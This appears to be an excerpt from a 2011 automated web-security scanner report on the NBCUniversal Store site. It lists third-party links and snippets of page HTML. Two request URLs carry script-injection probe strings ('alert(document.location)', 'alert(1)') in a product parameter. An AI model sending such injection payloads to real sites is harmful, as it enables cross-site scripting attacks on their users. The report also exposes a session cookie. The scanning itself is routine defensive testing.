src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446670?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446670?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446670?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446670?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446670?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446670?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446670?" border="0" alt="" /> </a>...[SNIP]... <h2 class="notoggler"><a href="http://www.nbcstudiotour.com" title="NBC Tour - Official NBC Universal Store" target="_blank" rel="nofollow"> NBC Studio Tour New York<span class="dot">...[SNIP]... <li class="navcat-child"><a href="http://telemundo.seenon.com/" target="_blank" title="Telemundo"> <span class="liname">...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446670?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446670?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446670?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446670?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446670?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;abr=!ie;ord=1313446670?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446670?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446670?" border="0" alt="" /> </a>...[SNIP]... <li class="facebook"><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank"> <img src="/nbcuniversalstore/layout/logo_facebook.gif" alt="Facebook Logo" />...[SNIP]... <li class="twitter"><a href="http://twitter.com/nbcstore" target="_blank"> <img src="/nbcuniversalstore/layout/logo_twitter.gif" alt="Twitter Logo" />...[SNIP]... <!-- START SCANALERT CODE --> <a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com"> <img width="115" height="32" border="0" src="//images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"> </a>...[SNIP]... <p id="companyCopy" style="font-size:11px;">©2011 <a href="http://www.nbcuni.com/"> NBCUniversal</a>...[SNIP]... <p id="daPower" style="margin-top:5px;">Powered by <a href="http://www.deliveryagent.com/" target="_blank"> <img src="/nbcuniversalstore/layout/logo_da.gif"alt="Delivery Agent" />...[SNIP]... <!-- End Dotomi Tag --> <script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script> <noscript><img height="1" width="1" border="0" src="http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </noscript>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
3.2. http://www.nbcuniversalstore.com//
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
//
Issue detail
The page was loaded from a URL containing a query string:http://www.nbcuniversalstore.com//?v=nbc_the-office&icid=nbcu_homepage_flash_the-office_show_button The response contains the following links to other domains:http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446654? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446654? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446654? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446654? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446654? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446654? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446654? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446654? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446654? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446654? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446654? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;abr=!ie;ord=1313446654? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446654? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446654? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446654? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446654? http://assets.resultspage.com/autosuggest/autosuggest.css http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif http://nbc.com/ http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js http://telemundo.seenon.com/ http://twitter.com/nbcstore http://www.deliveryagent.com/ http://www.facebook.com/pages/NBC-Universal-Store/27590173208 http://www.nbcstudiotour.com/ http://www.nbcuni.com/ https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com
Request
GET //?v=nbc_the-office&icid=nbcu_homepage_flash_the-office_show_button HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/nbcuniversalstore/flash/nbcu_Show_Slider.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253AHome%2520Page%7C1313448437353%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 72767 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:34 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml...[SNIP]... <link href="/nbcuniversalstore/layout/style.css?v=24" type="text/css" rel="stylesheet" /> <link rel="stylesheet" href="http://assets.resultspage.com/autosuggest/autosuggest.css" media="screen" type="text/css"> <link href="/nbcuniversalstore/layout/nbc/nbc.css?v=24" type="text/css" rel="stylesheet" />...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <div id="userMenu" > <a href="http://twitter.com/nbcstore" target="_blank" id="twitter"> <span class="socialize">...[SNIP]... </a><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank" id="facebook"> <span class="socialize">...[SNIP]... </a> <a href="http://NBC.com/" target="_blank" class="partnerlink "> Visit <img src="/nbcuniversalstore/layout/nbc/partnerLogo.gif" />...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446654?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446654?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446654?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446654?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446654?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446654?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446654?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446654?" border="0" alt="" /> </a>...[SNIP]... <h2 class="notoggler"><a href="http://www.nbcstudiotour.com" title="NBC Tour - Official NBC Universal Store" target="_blank" rel="nofollow"> NBC Studio Tour New York<span class="dot">...[SNIP]... <li class="navcat-child"><a href="http://telemundo.seenon.com/" target="_blank" title="Telemundo"> <span class="liname">...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446654?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446654?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446654?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446654?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446654?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;abr=!ie;ord=1313446654?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446654?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=8;sz=726x100;ord=1313446654?" border="0" alt="" /> </a>...[SNIP]... <li class="facebook"><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank"> <img src="/nbcuniversalstore/layout/logo_facebook.gif" alt="Facebook Logo" />...[SNIP]... <li class="twitter"><a href="http://twitter.com/nbcstore" target="_blank"> <img src="/nbcuniversalstore/layout/logo_twitter.gif" alt="Twitter Logo" />...[SNIP]... <!-- START SCANALERT CODE --> <a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com"> <img width="115" height="32" border="0" src="//images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"> </a>...[SNIP]... <p id="companyCopy" style="font-size:11px;">©2011 <a href="http://www.nbcuni.com/"> NBCUniversal</a>...[SNIP]... <p id="daPower" style="margin-top:5px;">Powered by <a href="http://www.deliveryagent.com/" target="_blank"> <img src="/nbcuniversalstore/layout/logo_da.gif"alt="Delivery Agent" />...[SNIP]... <!-- End Dotomi Tag --> <script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script> <noscript><img height="1" width="1" border="0" src="http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </noscript>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
3.3. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-2012-day-to-day-calendar/detail.php
Issue detail
The page was loaded from a URL containing a query string:http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php?p=303756%0087e46%3balert(document.location)//dbde9cd2c5d&v=nbc_the-office The response contains the following links to other domains:http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446864? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446864? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446864? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446864? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446864? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446864? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446864? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446864? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446864? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446864? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446864? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446864? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446864? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446864? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446864? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446864? http://api.recaptcha.net/js/recaptcha_ajax.js http://assets.resultspage.com/autosuggest/autosuggest.css http://connect.facebook.net/en_US/all.js http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27 http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell http://images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif http://nbc.com/ http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js http://s7.addthis.com/js/250/addthis_widget.js http://twitter.com/nbcstore http://www.addthis.com/bookmark.php?v=250&username=deliveryagent http://www.deliveryagent.com/ http://www.facebook.com/pages/NBC-Universal-Store/27590173208 http://www.nbcuni.com/ https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com
Request
GET /the-office-2012-day-to-day-calendar/detail.php?p=303756%0087e46%3balert(document.location)//dbde9cd2c5d&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/9 Cookie: DACART=qK2mk5eRnKeppoaV; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253AThe%2520Office%25202012%2520Day%2520to%2520Day%2520Calendar%253ADetail%7C1313448643208%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 68387 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:21:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:21:04 GMT Connection: close Set-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:21:03 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]... <link href="/nbcuniversalstore/layout/slimbox.css?v=24" type="text/css" rel="stylesheet" /> <link rel="stylesheet" href="http://assets.resultspage.com/autosuggest/autosuggest.css" media="screen" type="text/css"> <link href="/nbcuniversalstore/layout/nbc/nbc.css?v=24" type="text/css" rel="stylesheet" />...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <div id="userMenu" > <a href="http://twitter.com/nbcstore" target="_blank" id="twitter"> <span class="socialize">...[SNIP]... </a><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank" id="facebook"> <span class="socialize">...[SNIP]... </a> <a href="http://NBC.com/" target="_blank" class="partnerlink "> Visit <img src="/nbcuniversalstore/layout/nbc/partnerLogo.gif" />...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446864?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446864?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446864?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446864?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446864?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446864?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446864?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446864?" border="0" alt="" /> </a>...[SNIP]... <div id="contentHolder"> <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... <div class="addthis_toolbox addthis_default_style"> <a href="http://www.addthis.com/bookmark.php?v=250&username=deliveryagent" class="addthis_button last"> <img src="/nbcuniversalstore/layout/ico_addshare.gif" width="16" height="16" border="0" alt="" />...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=deliveryagent"> </script>...[SNIP]... <li> <a href="http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell" class="image"> <img src="/img/product/resized/433/00111426-923433_catl_50.jpg?k=608f4995&pid=111426&s=catl" alt="Mad Money w/ Jim Cramer Bobblehead" /></a> <a href="http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell" class="name"> Mad Money w/ Jim Cramer Bobblehead</a> <a href="http://html.aggregateknowledge.com/click/nocache/493808287/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=203181&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D111426%26icid%3Dxsell" class="price"> <strike>...[SNIP]... <li> <a href="http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell" class="image"> <img src="/img/product/resized/638/00295440-116638_catl_50.jpg?k=74c71735&pid=295440&s=catl" alt="Royal Wedding Catherine Middleton..." /></a> <a href="http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell" class="name"> Royal Wedding Catherine Middleton...</a> <a href="http://html.aggregateknowledge.com/click/nocache/850544849/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1088998&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D295440%26icid%3Dxsell" class="price"> $79.95<!-- IE6 -->...[SNIP]... <li class="last"> <a href="http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell" class="image"> <img src="/img/product/resized/633/00294588-893633_catl_50.jpg?k=42c51b37&pid=294588&s=catl" alt="Doctor Who New Booth T-Shirt" /></a> <a href="http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell" class="name"> Doctor Who New Booth T-Shirt</a> <a href="http://html.aggregateknowledge.com/click/nocache/319552888/?id=7ad1eede-1b32-4e13-8aaf-bcd57afc66dd&impid=32&rid=94&l=en_US&itemid=1072016&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D294588%26icid%3Dxsell" class="price"> $25.00<!-- IE6 -->...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446864?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446864?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446864?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446864?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446864?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446864?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446864?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446864?" border="0" alt="" /> </a>...[SNIP]... <li class="facebook"><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank"> <img src="/nbcuniversalstore/layout/logo_facebook.gif" alt="Facebook Logo" />...[SNIP]... <li class="twitter"><a href="http://twitter.com/nbcstore" target="_blank"> <img src="/nbcuniversalstore/layout/logo_twitter.gif" alt="Twitter Logo" />...[SNIP]... <!-- START SCANALERT CODE --> <a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com"> <img width="115" height="32" border="0" src="//images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"> </a>...[SNIP]... <p id="companyCopy" style="font-size:11px;">©2011 <a href="http://www.nbcuni.com/"> NBCUniversal</a>...[SNIP]... <p id="daPower" style="margin-top:5px;">Powered by <a href="http://www.deliveryagent.com/" target="_blank"> <img src="/nbcuniversalstore/layout/logo_da.gif"alt="Delivery Agent" />...[SNIP]... </script><script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script> <noscript><img height="1" width="1" border="0" src="http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </noscript>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
3.4. http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuniversalstore.com
Path:
/the-office-2012-day-to-day-calendar/detail.php
Issue detail
The page was loaded from a URL containing a query string:http://www.nbcuniversalstore.com/the-office-2012-day-to-day-calendar/detail.php?p=303756%0087e46%3balert(1)//dbde9cd2c5d&v=nbc_the-office The response contains the following links to other domains:http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446846? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446846? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446846? http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446846? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446846? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446846? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446846? http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446846? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446846? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446846? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446846? http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446846? http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446846? 